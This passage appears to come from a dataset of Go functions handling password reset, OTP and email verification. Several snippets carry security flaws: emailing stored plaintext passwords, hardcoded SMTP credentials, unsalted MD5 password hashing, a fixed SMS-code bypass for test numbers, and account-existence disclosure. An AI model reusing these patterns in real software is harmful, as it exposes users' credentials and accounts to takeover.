\"application/json\")\n\n\tpassResetReq := &PasswordResetReq{}\n\terr := data.FromJSON(passResetReq, r.Body)\n\tif err != nil {\n\t\tah.logger.Error(\"unable to decode password reset request json\", \"error\", err.Error())\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: err.Error()}, w)\n\t\treturn\n\t}\n\n\tuserID := r.Context().Value(UserIDKey{}).(string)\n\tuser, err := ah.repo.GetUserByID(context.Background(), userID)\n\tif err != nil {\n\t\tah.logger.Error(\"unable to retrieve the user from db\", \"error\", err)\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: \"Unable to reset password. Please try again later\"}, w)\n\t\treturn\n\t}\n\n\tverificationData, err := ah.repo.GetVerificationData(context.Background(), user.Email, data.PassReset)\n\tif err != nil {\n\t\tah.logger.Error(\"unable to retrieve the verification data from db\", \"error\", err)\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: \"Unable to reset password. Please try again later\"}, w)\n\t\treturn\n\t}\n\n\tif verificationData.Code != passResetReq.Code {\n\t\t// we should never be here.\n\t\tah.logger.Error(\"verification code did not match even after verifying PassReset\")\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: \"Unable to reset password. Please try again later\"}, w)\n\t\treturn\n\t}\n\n\tif passResetReq.Password != passResetReq.PasswordRe {\n\t\tah.logger.Error(\"password and password re-enter did not match\")\n\t\tw.WriteHeader(http.StatusNotAcceptable)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: \"Password and re-entered Password are not same\"}, w)\n\t\treturn\n\t}\n\n\thashedPass, err := ah.hashPassword(passResetReq.Password)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: UserCreationFailed}, w)\n\t\treturn\n\t}\n\n\ttokenHash := utils.GenerateRandomString(15)\n\terr = ah.repo.UpdatePassword(context.Background(), userID, hashedPass, tokenHash)\n\tif err != nil {\n\t\tah.logger.Error(\"unable to update user password in db\", \"error\", err)\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tdata.ToJSON(&GenericResponse{Status: false, Message: \"Password and re-entered Password are not same\"}, w)\n\t\treturn\n\t}\n\n\t// delete the VerificationData from db\n\terr = ah.repo.DeleteVerificationData(context.Background(), verificationData.Email, verificationData.Type)\n\tif err != nil {\n\t\tah.logger.Error(\"unable to delete the verification data\", \"error\", err)\n\t}\n\n\tw.WriteHeader(http.StatusOK)\n\tdata.ToJSON(&GenericResponse{Status: false, Message: \"Password Reset Successfully\"}, w)\n}", "func requestOTP(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tvar (\n\t\tdata otpRequest\n\t\tstoredOTP string\n\t\tuser User\n\t)\n\n\terr := json.NewDecoder(r.Body).Decode(&data)\n\n\tdb.Find(&user, \"email = ?\", data.Email)\n\tkey := \"new_user_otp_\" + data.Email\n\tstoredOTP, err = redisClient.Get(ctx, key).Result()\n\n\tlog.ErrorHandler(err)\n\n\tif storedOTP == \"\" {\n\t\tverifiableToken := generateOTP()\n\t\terr = redisClient.Set(ctx, key, verifiableToken, 30*time.Minute).Err()\n\t\tstoredOTP = verifiableToken\n\t}\n\n\tpayload := struct {\n\t\tToken string\n\t}{\n\t\tToken: storedOTP,\n\t}\n\tvar status bool\n\tstatus, err = core.SendEmailNoAttachment(data.Email, \"OTP for Verification\", payload, \"token.txt\")\n\tif !status {\n\t\tlog.ErrorHandler(err)\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\terr = json.NewEncoder(w).Encode(core.FiveHundred)\n\t\tlog.ErrorHandler(err)\n\t\tlog.AccessHandler(r, 500)\n\t\treturn\n\t}\n\tw.WriteHeader(http.StatusOK)\n\tlog.AccessHandler(r, 200)\n\treturn\n\n}", "func (c *Client) ForgotPassword(emailAddress string) (err error) {\n\n\t// Basic requirements\n\tif len(emailAddress) == 0 {\n\t\terr = c.createError(fmt.Sprintf(\"missing required attribute: %s\", fieldEmail), http.StatusBadRequest)\n\t\treturn\n\t}\n\n\t// Start the post data\n\tdata := map[string]string{fieldEmail: emailAddress}\n\n\t// Fire the Request\n\tvar response string\n\tif response, err = c.Request(fmt.Sprintf(\"%s/password/forgot\", modelUser), http.MethodPost, data); err != nil {\n\t\treturn\n\t}\n\n\t// Only a 200 is treated as a success\n\terr = c.Error(http.StatusOK, response)\n\treturn\n}", "func verifyEmail(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tvar (\n\t\tdata otp\n\t\tuser User\n\t)\n\terr := json.NewDecoder(r.Body).Decode(&data)\n\tlog.ErrorHandler(err)\n\n\t// Gets the user and checks if the mail is already verified\n\tdb.Find(&user, \"email = ?\", strings.ToLower(data.Email))\n\tif user.IsEmailVerified {\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\terr = json.NewEncoder(w).Encode(core.FourHundred)\n\t\tlog.ErrorHandler(err)\n\t\tlog.AccessHandler(r, 400)\n\t\treturn\n\t}\n\n\t// Gets the OTP stored in redis\n\tvar storedOTP string\n\tkey := \"new_user_otp_\" + data.Email\n\tstoredOTP, err = redisClient.Get(ctx, key).Result()\n\tlog.ErrorHandler(err)\n\n\t// If the OTP is empty, or the key doesn't exist or the pin provided is incorrect,\n\t// the pin has either elapsed the 30 minutes given or just plain wrong\n\t// So they need to request a new one\n\tif storedOTP == \"\" || storedOTP != data.Pin {\n\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\terr = json.NewEncoder(w).Encode(core.FourOOne)\n\t\tlog.ErrorHandler(err)\n\t\tlog.AccessHandler(r, 401)\n\t\treturn\n\t}\n\n\tw.WriteHeader(http.StatusOK)\n\tuser.IsEmailVerified = true\n\tdb.Save(&user)\n\tlog.AccessHandler(r, 200)\n\n\tredisClient.Del(ctx, key)\n\treturn\n\n}", "func ResetPassword(w http.ResponseWriter, r *http.Request) {\n\tvar data struct {\n\t\tEmail string `json:\"email\"`\n\t}\n\n\t// Decode request body into data.\n\tif err := json.NewDecoder(r.Body).Decode(&data); err != nil {\n\t\tfmt.Printf(\"json decode failed: %v\\n\", err)\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tjson.NewEncoder(w).Encode(errors.ErrorMsg{\"json decode failed\"})\n\t\treturn\n\t}\n\n\t// Validate user provided email.\n\tif len(data.Email) == 0 {\n\t\terr := fmt.Errorf(\"email can not be empty\")\n\t\tfmt.Printf(\"validation failed: %v\\n\", err)\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\tjson.NewEncoder(w).Encode(errors.ErrorMsg{\"validation failed\"})\n\t\treturn\n\t}\n\n\t// Fetch user by email address provided.\n\tvar person model.Person\n\n\tvar db = database.DB()\n\n\tq := db.Where(model.Person{Email: data.Email}).First(&person)\n\n\tif q.RecordNotFound() {\n\t\tfmt.Printf(\"record not found\\n\")\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\tjson.NewEncoder(w).Encode(errors.ErrorMsg{\"invalid email or password\"})\n\t\treturn\n\t} else if q.Error != nil {\n\t\tfmt.Printf(\"unknown database error: %v\\n\", q.Error)\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tjson.NewEncoder(w).Encode(errors.ErrorMsg{\"unknown database error\"})\n\t\treturn\n\t}\n\n\tfrom := \"[email protected]\"\n\tpass := \"Neareastuniversity\"\n\tto := data.Email\n\tbody := \"Your password is \" + person.Password\n\tmsg := \"From: \" + from + \"\\n\" + \"To: \" + to + \"\\n\" + \"Subject: Reset Password from CodeStack\\n\\n\" + body\n\n\tif err := smtp.SendMail(\"smtp.gmail.com:587\", smtp.PlainAuth(\"\", from, pass, \"smtp.gmail.com\"), from, []string{to}, []byte(msg)); err != nil {\n\t\tfmt.Printf(\"smtp error: %v\\n\", err)\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tjson.NewEncoder(w).Encode(errors.ErrorMsg{\"smtp error\"})\n\t\treturn\n\t}\n\n\t// Success\n\tw.WriteHeader(http.StatusNoContent)\n}", "func (s *Supervisor) passwordReset(token *auth.Token, mr *msg.Result) bool {\n\n\t// decrypt e2e encrypted request\n\t// token.UserName is the username\n\t// token.Password is the _NEW_ password that should be set\n\t// token.Token is the ldap password or mailtoken\n\n\t// validate external credentials\n\tswitch s.activation {\n\tcase `ldap`:\n\t\tif ok, err := validateLdapCredentials(token.UserName, token.Token); err != nil {\n\t\t\tmr.ServerError(err, mr.Section)\n\t\t\tmr.Super.Audit.WithField(`Code`, mr.Code).Warningln(err)\n\t\t\treturn false\n\t\t} else if !ok {\n\t\t\tmr.Forbidden(fmt.Errorf(`Invalid LDAP credentials`))\n\t\t\tmr.Super.Audit.\n\t\t\t\tWithField(`Code`, mr.Code).\n\t\t\t\tWarningln(mr.Error)\n\t\t\treturn false\n\t\t}\n\tcase `token`:\n\t\tmr.NotImplemented(fmt.Errorf(`Mail-Token not supported yet`),\n\t\t\tmr.Section)\n\t\tmr.Super.Audit.\n\t\t\tWithField(`Code`, mr.Code).\n\t\t\tWarningln(mr.Error)\n\t\treturn false\n\tdefault:\n\t\tmr.ServerError(fmt.Errorf(\"Unknown activation method: %s\",\n\t\t\ts.conf.Auth.Activation), mr.Section)\n\t\tmr.Super.Audit.\n\t\t\tWithField(`Code`, mr.Code).\n\t\t\tWarningln(mr.Error)\n\t\treturn false\n\t}\n\n\treturn true\n}", "func HKRegisterResetPassword(username string, phoneNumber string, newPassWD string) (s1 string, err error) {\n\t// nhập số phone , và password lưu tạm\n\totpPhone, err := dataCenter.GetOtpPhone()\n\tif err != nil {\n\t\tlog.LogSerious(\"err insert otp_code %v,phoneNumber %v\", err, phoneNumber)\n\t\treturn \"\", errors.New(\"Hệ thông hiện đang nâng cấp tính năng này!\")\n\t}\n\tphoneNumber = utils.NormalizePhoneNumber(phoneNumber)\n\tfmt.Println(phoneNumber)\n\tplayerInstance := player.FindPlayerWithPhoneNumber(phoneNumber)\n\tif playerInstance == nil {\n\t\treturn \"\", errors.New(\"Số điện thoại này không có trong hệ thống\")\n\t}\n\n\tif !playerInstance.IsVerify() {\n\t\treturn \"\", errors.New(\"Bạn chưa xác nhận số điện thoại này\")\n\t}\n\tif strings.ToLower(playerInstance.Username()) != strings.ToLower(username) {\n\t\treturn \"\", errors.New(\"Tên đăng nhập và số điện thoại không khớp!\")\n\t}\n\totp := hkCanRequestNewOtpCode(playerInstance.Id())\n\tif otp != \"\" {\n\t\treturn fmt.Sprintf(\"sms:%s?body=%s\", otpPhone, otp),\n\t\t\terrors.New(fmt.Sprintf(\"Để đặt lại mật khẩu bạn vui lòng gửi tin nhắn %s đến số điện thoại %s!\", otp, otpPhone))\n\t}\n\tplayerInstance.SetNewPassWD(newPassWD)\n\t//player.newPasswd = newPassWD\n\totpCodeString := utils.RandSeqLowercase(4)\n\n\trow := dataCenter.Db().QueryRow(\"INSERT INTO otp_code (player_id, phone_number, reason, otp_code, status, expired_at, created_at,passwd) \"+\n\t\t\" VALUES ($1, $2, $3, $4, $5, $6, $7, $8) RETURNING id\",\n\t\tplayerInstance.Id(),\n\t\tphoneNumber,\n\t\t\"reset_password\",\n\t\totpCodeString,\n\t\tkStatusWaitingForUser,\n\t\ttime.Now().Add(game_config.OtpExpiredAfter()).UTC(), time.Now().UTC(),\n\t\tnewPassWD)\n\tvar id int64\n\terr = row.Scan(&id)\n\tif err != nil {\n\t\tlog.LogSerious(\"err insert otp_code %v,playerId %d\", err, playerInstance.Id())\n\t\treturn \"\", errors.New(\"Hệ thông hiện đang nâng cấp tính năng này!\")\n\t}\n\n\treturn fmt.Sprintf(\"sms:%s?body=%s\", otpPhone, otpCodeString),\n\t\terrors.New(fmt.Sprintf(\"Để đặt lại mật khẩu bạn vui lòng gửi tin nhắn %s đến số điện thoại %s!\", otpCodeString, otpPhone))\n}", "func resetpassword(email, newpass string) error {\n\tm := gomail.NewMessage()\n\tm.SetHeader(\"From\", mailfrom)\n\tm.SetHeader(\"To\", email)\n\tm.SetHeader(\"Subject\", \"Changement de mot de passe\")\n\tm.SetBody(\"text/plain\", \"Ton nouveau mot de passe est: \"+newpass)\n\n\td := gomail.NewDialer(smtpserver, smtpport, \"\", \"\")\n\n\tif err := d.DialAndSend(m); err != nil {\n\t\treturn errors.New(\"Connexion impossible avec le serveur smtp\")\n\t}\n\treturn nil\n}", "func ResetPassword(c echo.Context) error {\n\t// Read the json body\n\tb, err := ioutil.ReadAll(c.Request().Body)\n\tif err != nil {\n\t\treturn echo.NewHTTPError(http.StatusBadRequest, err.Error())\n\t}\n\n\t// Verify length\n\tif len(b) == 0 {\n\t\treturn c.JSON(http.StatusBadRequest, map[string]string{\n\t\t\t\"verbose_msg\": \"You have sent an empty json\"})\n\t}\n\n\t// Validate JSON\n\tl := gojsonschema.NewBytesLoader(b)\n\tresult, err := app.EmailSchema.Validate(l)\n\tif err != nil {\n\t\treturn c.JSON(http.StatusBadRequest, err.Error())\n\t}\n\tif !result.Valid() {\n\t\tmsg := \"\"\n\t\tfor _, desc := range result.Errors() {\n\t\t\tmsg += fmt.Sprintf(\"%s, \", desc.Description())\n\t\t}\n\t\tmsg = strings.TrimSuffix(msg, \", \")\n\t\treturn c.JSON(http.StatusBadRequest, map[string]string{\n\t\t\t\"verbose_msg\": msg})\n\t}\n\n\t// Bind it to our User instance.\n\tvar jsonEmail map[string]interface{}\n\terr = json.Unmarshal(b, &jsonEmail)\n\tif err != nil {\n\t\treturn c.JSON(http.StatusInternalServerError, err.Error())\n\t}\n\tresetEmail := jsonEmail[\"email\"].(string)\n\n\t// check if email already exists in DB.\n\tEmailExist, _ := user.CheckEmailExist(resetEmail)\n\tif !EmailExist {\n\t\treturn c.JSON(http.StatusBadRequest, map[string]string{\n\t\t\t\"verbose_msg\": \"Email does not exists !\"})\n\t}\n\n\tu, err := user.GetUserByEmail(resetEmail)\n\tif err != nil {\n\t\treturn c.JSON(http.StatusInternalServerError, err.Error())\n\t}\n\n\ttoken, err := u.GenerateResetPasswordToken()\n\tif err != nil {\n\t\treturn c.JSON(http.StatusInternalServerError, err.Error())\n\t}\n\n\t// Generate the email confirmation url\n\tlink := viper.GetString(\"ui.address\") + \"/reset-password\" + \"?token=\" + token\n\tgo email.Send(u.Username, link, u.Email, \"reset\")\n\n\treturn c.JSON(http.StatusOK, map[string]string{\n\t\t\"verbose_msg\": \"ok\",\n\t})\n}", "func (e *PostReg) CallPostReg(ctx context.Context, req *POSTREG.Request, rsp *POSTREG.Response) error {\n\tbeego.Info(\"发送注册表单 PostReg /api/v1.0/users\")\n\t/*\n\t验证短信验证码\n\t将数据存入数据库\n\t创建sessionid\n\t以sessionid为key的一部分创建session\n\t */\n\t// 初始化返回\n\trsp.Error = utils.RECODE_OK\n\trsp.ErrMsg = utils.RecodeText(rsp.Error)\n\t// 获取请求中的参数\n\tmobile := req.GetMobile()\n\tpassword := req.GetPassword()\n\tsmsCode := req.GetSmsCode()\n\t// get缓存\n\tredisConf := map[string]string{\n\t\t\"key\": utils.G_server_name,\n\t\t\"conn\": utils.G_redis_addr + \":\" + utils.G_redis_port,\n\t}\n\t// 将map转换为json\n\tredisConfJSON, _ := json.Marshal(redisConf)\n\n\t// 链接redis\n\tbm, err := cache.NewCache(\"redis\", string(redisConfJSON))\n\tif err != nil {\n\t\tbeego.Info(\"缓存查询失败\", err)\n\t\trsp.Error = utils.RECODE_DBERR\n\t\trsp.ErrMsg = utils.RecodeText(rsp.Error)\n\t\treturn err\n\t}\n\t// 取出验证码信息\n\treply := bm.Get(mobile)\n\t// \t测试账号绿色通道.1~100,短信验证码固定为123\n\tif i, _ := strconv.Atoi(mobile); i <= 100 && i >= 1 {\n\t\treply = \"123\"\n\t}\n\tif reply == nil {\n\t\tbeego.Info(\"缓存查询结果为空:验证码1\")\n\t\trsp.Error = utils.RECODE_NODATA\n\t\trsp.ErrMsg = utils.RecodeText(rsp.Error)\n\t\treturn nil\n\t}\n\tstr, _ := redis.String(reply, nil)\n\tif str != smsCode {\n\t\tbeego.Info(\"短信验证码错误\", str, \"?\", smsCode)\n\t\trsp.Error = utils.RECODE_SMSCDERR\n\t\trsp.ErrMsg = utils.RecodeText(rsp.Error)\n\t\treturn nil\n\t}\n\t//短信通过验证,开始注册用户\n\t// 1.构建用户数据结构\n\tuser := models.User{\n\t\tName: mobile,\n\t\tPassword_hash: utils.GetMd5String(password),\n\t\tMobile: mobile,\n\t}\n\t// 2.链接并操作数据库\n\to := orm.NewOrm()\n\tid, err := o.Insert(&user)\n\tif err != nil {\n\t\tbeego.Info(\"数据库插入用户失败\", err)\n\t\trsp.Error = utils.RECODE_DBERR\n\t\trsp.ErrMsg = utils.RecodeText(rsp.Error)\n\t\treturn err\n\t}\n\tbeego.Info(\"用户注册成功,用户ID:\", id)\n\t// 给用户生成SessionID并返回\n\tsessionID := utils.GetMd5String(mobile + password)\n\trsp.SessionID = sessionID\n\t// 用户信息存入缓存,格式key:sessionID+用户字段 vaule:字段值\n\tbm.Put(sessionID+\"user_id\", id, time.Second*3600)\n\tbm.Put(sessionID+\"user_name\", mobile, time.Second*3600)\n\tbm.Put(sessionID+\"user_mobile\", mobile, time.Second*3600)\n\treturn nil\n}", "func (h *AuthHandlers) ForgotConfirm(w http.ResponseWriter, req *http.Request) {\n\tvar err error\n\tvar data []byte\n\n\tsystemContext, err := h.getSystemContext(req)\n\tif err != nil {\n\t\tlog.Error().Err(err).Msg(\"request context retrevial failure\")\n\t\tmiddleware.ReturnError(w, err.Error(), 500)\n\t\treturn\n\t}\n\n\tif data, err = ioutil.ReadAll(req.Body); err != nil {\n\t\tlog.Error().Err(err).Msg(\"read body error\")\n\t\tmiddleware.ReturnError(w, \"error reading refresh data\", 500)\n\t\treturn\n\t}\n\tdefer req.Body.Close()\n\n\tresetDetails := &authz.ResetDetails{}\n\tif err := json.Unmarshal(data, resetDetails); err != nil {\n\t\tlog.Error().Err(err).Msg(\"marshal body error\")\n\t\tmiddleware.ReturnError(w, \"error reading forgot_confirm data\", 500)\n\t\treturn\n\t}\n\n\tif err := h.validate.Struct(resetDetails); err != nil {\n\t\tmiddleware.ReturnError(w, \"validation failure \"+err.Error(), 500)\n\t\treturn\n\t}\n\n\tresetDetails.OrgName = strings.ToLower(resetDetails.OrgName)\n\tresetDetails.Username = strings.ToLower(resetDetails.Username)\n\n\torgData, err := h.getOrgByName(req.Context(), systemContext, resetDetails.OrgName)\n\tif err != nil {\n\t\tlog.Error().Err(err).Msg(\"failed to get organization from name\")\n\t\tmiddleware.ReturnError(w, \"forgot password confirm failed\", 403)\n\t\treturn\n\t}\n\n\tif err := h.authenticator.Reset(req.Context(), orgData, resetDetails); err != nil {\n\t\tlog.Error().Err(err).Msg(\"forgot password confirm failed\")\n\t\tmiddleware.ReturnError(w, \"forgot password confirm failed\", 403)\n\t\treturn\n\t}\n\n\tresp := make(map[string]string, 0)\n\tresp[\"status\"] = \"ok\"\n\n\trespData, _ := json.Marshal(resp)\n\tw.WriteHeader(200)\n\tfmt.Fprint(w, string(respData))\n}", "func ForgotPassOTP(rw http.ResponseWriter, req *http.Request) {\n\tif req.Method == \"GET\" {\n\t\trw.Write([]byte(\"Only POST request allowed\"))\n\t} else {\n\n\t\t// Input from request body\n\t\tdec := json.NewDecoder(req.Body)\n\t\tvar inp c.User\n\t\terr := dec.Decode(&inp)\n\t\tif err != nil {\n\t\t\trw.WriteHeader(http.StatusBadRequest)\n\t\t\trw.Write(Rsp(err.Error(), \"Error in Decoding Data\"))\n\t\t\treturn\n\t\t}\n\n\t\t// Validate the request if it is empty\n\t\tif valid := c.ValidateUserforOTP(inp); valid != \"\" {\n\t\t\trw.WriteHeader(http.StatusBadRequest)\n\t\t\trw.Write(Rsp(valid, \"Bad Request\"))\n\t\t\treturn\n\t\t}\n\t\t\n\t\t// Get user\n\t\tt, err := db.GetUser(inp.Roll)\n\t\tif err != nil {\n\t\t\trw.WriteHeader(http.StatusBadRequest)\n\t\t\trw.Write(Rsp(err.Error(), \"User Doesnot exist\"))\n\t\t\treturn\n\t\t}\n\n\n\t\t// Check Spam\n\t\tif db.ExceedMaxOTP_forgotpass(t.Roll) {\n\t\t\trw.WriteHeader(http.StatusBadRequest)\n\t\t\trw.Write(Rsp(\"too frequent otp requests\", \"please try again after a week\"))\n\t\t\treturn\n\t\t}\n\n\t\t// Get OTP\n\t\tOTP := c.GenerateOTP()\n\n\t\t// Hash and salt OTP\n\t\tt.OTP = auth.HashAndSalt([]byte(OTP))\n\n\t\t// Insert in DB\n\t\tif valid := db.StoreOTP(t); valid != \"\" {\n\t\t\trw.WriteHeader(http.StatusBadRequest)\n\t\t\trw.Write(Rsp(valid, \"Error in Storing OTP\"))\n\t\t\treturn\n\t\t}\n\n\t\t// emailing OTP\n\t\tif valid := c.Email(t, OTP, 1); valid != \"\" {\n\t\t\trw.WriteHeader(http.StatusBadRequest)\n\t\t\trw.Write(Rsp(valid, \"Error in sending Email\"))\n\t\t\treturn\n\t\t}\n\n\t\t\n\t\t// Everything went well\n\t\trw.WriteHeader(http.StatusOK)\n\t\trw.Write(Rsp(\"\", \"email Sent\"))\n\t}\n}", "func ForgotPass(rw http.ResponseWriter, req *http.Request) {\n\tif req.Method == \"GET\" {\n\t\trw.Write([]byte(\"Only POST request allowed\"))\n\t} else {\n\n\t\t// Input from request body\n\t\tdec := json.NewDecoder(req.Body)\n\t\tvar t c.User\n\t\terr := dec.Decode(&t)\n\n\t\tif err != nil {\n\t\t\trw.WriteHeader(http.StatusBadRequest)\n\t\t\trw.Write(Rsp(err.Error(), \"Error in Decoding Data\"))\n\t\t\treturn\n\t\t}\n\n\t\t// Validate the request if it is empty\n\t\tif valid := c.ValidatePass(t); valid != \"\" {\n\t\t\trw.WriteHeader(http.StatusBadRequest)\n\t\t\trw.Write(Rsp(valid, \"Bad Request\"))\n\t\t\treturn\n\t\t}\n\n\t\t// Hash password\n\t\tt.Password = auth.HashAndSalt([]byte(t.Password))\n\n\t\t// check otp\n\t\thashotp, otpID, err := db.GetOTP(t.Roll)\n\t\tif err != nil {\n\t\t\trw.WriteHeader(http.StatusBadRequest)\n\t\t\trw.Write(Rsp(err.Error(), \"Error in fetching OTP\"))\n\t\t\treturn\n\t\t}\n\n\t\t// check if otp is valid\n\t\tif err := auth.Verify(t.OTP, hashotp); err != nil {\n\t\t\trw.WriteHeader(http.StatusBadRequest)\n\t\t\trw.Write(Rsp(err.Error(), \"Error in Verifying OTP\"))\n\t\t\treturn\n\t\t}\n\n\t\tdefer db.MarkOTP(otpID)\n\n\t\t// Insert in DB\n\t\terr = db.ChangePassword(t)\n\t\tif err != nil {\n\t\t\trw.WriteHeader(http.StatusBadRequest)\n\t\t\trw.Write(Rsp(err.Error(), \"Error in Changing Pass Up\"))\n\t\t\treturn\n\t\t}\n\n\t\t// Everything went well\n\t\trw.WriteHeader(http.StatusOK)\n\t\trw.Write(Rsp(\"\", \"Password reset succesful\"))\n\t}\n}", "func (h *UserRepos) ResetPassword(ctx context.Context, w http.ResponseWriter, r *http.Request, params map[string]string) error {\n\n\tctxValues, err := webcontext.ContextValues(ctx)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t//\n\treq := new(user.UserResetPasswordRequest)\n\tdata := make(map[string]interface{})\n\tf := func() error {\n\n\t\tif r.Method == http.MethodPost {\n\t\t\terr := r.ParseForm()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tdecoder := schema.NewDecoder()\n\t\t\tif err := decoder.Decode(req, r.PostForm); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t_, err = h.UserRepo.ResetPassword(ctx, *req, ctxValues.Now)\n\t\t\tif err != nil {\n\t\t\t\tswitch errors.Cause(err) {\n\t\t\t\tdefault:\n\t\t\t\t\tif verr, ok := weberror.NewValidationError(ctx, err); ok {\n\t\t\t\t\t\tdata[\"validationErrors\"] = verr.(*weberror.Error)\n\t\t\t\t\t\treturn nil\n\t\t\t\t\t} else {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// Display a success message to the user to check their email.\n\t\t\twebcontext.SessionFlashSuccess(ctx,\n\t\t\t\t\"Check your email\",\n\t\t\t\tfmt.Sprintf(\"An email was sent to '%s'. Click on the link in the email to finish resetting your password.\", req.Email))\n\n\t\t}\n\n\t\treturn nil\n\t}\n\n\tif err := f(); err != nil {\n\t\treturn web.RenderError(ctx, w, r, err, h.Renderer, TmplLayoutBase, TmplContentErrorGeneric, web.MIMETextHTMLCharsetUTF8)\n\t}\n\n\tdata[\"form\"] = req\n\n\tif verr, ok := weberror.NewValidationError(ctx, webcontext.Validator().Struct(user.UserResetPasswordRequest{})); ok {\n\t\tdata[\"validationDefaults\"] = verr.(*weberror.Error)\n\t}\n\n\treturn h.Renderer.Render(ctx, w, r, TmplLayoutBase, \"user-reset-password.gohtml\", web.MIMETextHTMLCharsetUTF8, http.StatusOK, data)\n}", "func ForgotPasswordPostHandler(ctx *enliven.Context) {\n\tif !ctx.Enliven.Core.Email.Enabled() {\n\t\tctx.Forbidden()\n\t\treturn\n\t}\n\n\tctx.Request.ParseForm()\n\tvar errors []FormError\n\temail := strings.TrimSpace(ctx.Request.Form.Get(\"email\"))\n\n\tif !govalidator.IsEmail(email) {\n\t\terrors = append(errors, FormError{\n\t\t\tMessage: \"The provided email address is invalid.\",\n\t\t\tField: \"email\",\n\t\t})\n\t}\n\n\tif len(errors) > 0 {\n\t\tjsonResponse, _ := json.Marshal(errors)\n\t\tctx.Strings[\"FormErrors\"] = string(jsonResponse[:])\n\t} else {\n\t\t// Even if we can't find the requested email, we will pretend we found it for security purposes.\n\t\tctx.Strings[\"EmailAddress\"] = email\n\t\tdb := database.GetDatabase()\n\t\tconf := config.GetConfig()\n\n\t\tu := User{}\n\t\tdb.Where(\"Email = ?\", email).First(&u)\n\t\tif u.ID != 0 {\n\t\t\t// Setting a verification code for this user.\n\t\t\tverificationCode, _ := randutil.AlphaString(32)\n\t\t\tu.VerificationCode = verificationCode\n\t\t\tdb.Save(&u)\n\n\t\t\t// Rendering the email that we're going to send to the user.\n\t\t\ttemplateData := map[string]interface{}{\n\t\t\t\t\"User\": u,\n\t\t\t\t\"Context\": ctx,\n\t\t\t\t\"Config\": conf,\n\t\t\t}\n\t\t\tvar bMessage bytes.Buffer\n\t\t\teerr := ctx.Enliven.Core.TemplateManager.BaseTemplate.ExecuteTemplate(&bMessage, \"user_forgot_password_email\", templateData)\n\t\t\tif eerr != nil {\n\t\t\t\tfmt.Println(eerr.Error())\n\t\t\t}\n\n\t\t\t// Sending the email.\n\t\t\temail := ctx.Enliven.Core.Email.New()\n\t\t\temail.AddRecipient(u.Email)\n\t\t\temail.Subject = conf[\"site_name\"] + \": Password Reset Request\"\n\t\t\temail.Message = bMessage.String()\n\t\t\terr := email.Send()\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(err.Error())\n\t\t\t}\n\t\t}\n\t}\n\n\tctx.ExecuteBaseTemplate(\"user_forgot_password\")\n}", "func ResendVerifyEmail(w http.ResponseWriter, r *http.Request, DB *gorm.DB) {\n\tvar currentUser User\n\tvar dbUser User\n\trequestBody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\terrorResponse := response.JsonResponse(\"An error occured\", 500)\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(http.StatusNotFound)\n\t\tjson.NewEncoder(w).Encode(errorResponse)\n\t}\n\tjson.Unmarshal(requestBody, &currentUser)\n\tDB.Where(\"Email = ?\", currentUser.Email).First(&dbUser)\n\tfmt.Println(dbUser.VerifyToken)\n\tif dbUser.VerifyToken != \"\" {\n\t\tverifyTokenResponse := response.JsonResponse(\"Check your email for verification token\", 200)\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(http.StatusOK)\n\t\tparentURL := \"localhost:8080/api/v1/user/verify-email?token=\"\n\t\tverifyURL := parentURL + dbUser.VerifyToken\n\t\ttemplate1 := \"<html><body><h1>Welcome to paingha.me</h1><br />\" + \"<a href='\" + verifyURL + \"'>Verify Email</a></body></html>\"\n\t\tto := []string{dbUser.Email}\n\t\tmailerResponse := mailer.SendMail(to, \"Please Verify your Email\", template1)\n\t\tfmt.Println(mailerResponse)\n\t\tjson.NewEncoder(w).Encode(verifyTokenResponse)\n\t} else {\n\t\tverifyResponse := response.JsonResponse(\"Email Already Verified. Login\", 200)\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(http.StatusOK)\n\t\tjson.NewEncoder(w).Encode(verifyResponse)\n\t}\n}", "func SendRestoreCodeToUser(mail, code string) {\n\tfrom := \"[email protected]\"\n\tpassword := \"8LYL6GnWpwqgs3k\" // Receiver email address.\n\tto := []string{\n\t\tmail,\n\t} // smtp server configuration.\n\tsmtpServer := smtpServer{host: \"smtp.gmail.com\", port: \"587\"}\n\tmsg := \"Here your code to restore your password: \" + code // Message.\n\tmessage := []byte(msg) // Authentication.\n\tauth := smtp.PlainAuth(\"\", from, password, smtpServer.host) // Sending email.\n\terr := smtp.SendMail(smtpServer.Address(), auth, from, to, message)\n\tif err != nil 